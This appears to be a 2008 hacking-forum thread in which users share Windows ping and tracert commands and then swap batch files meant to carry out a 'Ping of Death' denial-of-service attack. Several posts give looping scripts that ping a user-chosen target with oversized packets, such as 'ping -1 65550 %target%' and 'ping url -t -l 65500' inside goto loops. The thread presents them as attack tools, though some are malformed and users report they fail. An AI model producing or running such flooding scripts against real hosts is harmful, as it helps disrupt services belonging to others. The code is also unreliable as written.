06-23-2008, 05:57 AM
Pages: 1 2
06-23-2008, 06:39 AM
ping "ip or url"
ping6 "ip or url"
to find an ip of a page type
tracert "URL"
ping6 "ip or url"
to find an ip of a page type
tracert "URL"
06-23-2008, 06:43 AM
i remeber we can make a bat file called ping of death am i right cuz i only use cmd not a bat and sum times i used to use programs!
06-23-2008, 09:13 AM
kira.hacker Wrote:i remeber we can make a bat file called ping of death am i right cuz i only use cmd not a bat and sum times i used to use programs!
There is something called "Ping of Death" that would send large over sized packets to a target and DoS it, but very few systems are vulnerable to that exploit nowadays.
06-23-2008, 12:52 PM
I think I downloaded that one day in some like 'hacker fun pack' 

06-23-2008, 01:14 PM
Lol I was not aware that you could "download" the ping of death. All you do to use it is go into command prompt and ping a target with these parameters:
This would DoS older systems since the maximum size that is usually accepted of a ping is 65536 octets and this sends 65550 with argument of -1 which would cause systems without proper data validation (modern systems have this) to hang.
Code:
ping -1 65550 (target)06-23-2008, 01:52 PM
ping url/ ip -t -l (amount of data here)
06-23-2008, 01:57 PM
Code:
@echo off
color a
title pingerer
cls
echo Target:
set /p target
:a
ping -1 65550 %target%
goto :a06-23-2008, 02:04 PM
Ikeo Wrote:Why not just putCode:
@echo off
color a
title pingerer
cls
echo Target:
set /p target
:a
ping -1 65550 %target%
goto :a
Code:
@echo off
:a
ping url -t -l (amount of memory)
goto :a06-23-2008, 02:15 PM
Because with Ikeo's you can ping any website with the same bat. But Ikeo's doesn't work... You should put this:
But that still doesn't work
he asks for ip but when I put ip he still asks for it =S
Edit: Alright, Dead-crap's method works, but when I start it, it says request timed out...
Code:
@echo off
color a
title pingerer
cls
echo Target:
echo.
set /p=target
:a
ping %target% -t -l 65500
goto :aBut that still doesn't work
he asks for ip but when I put ip he still asks for it =SEdit: Alright, Dead-crap's method works, but when I start it, it says request timed out...
Pages: 1 2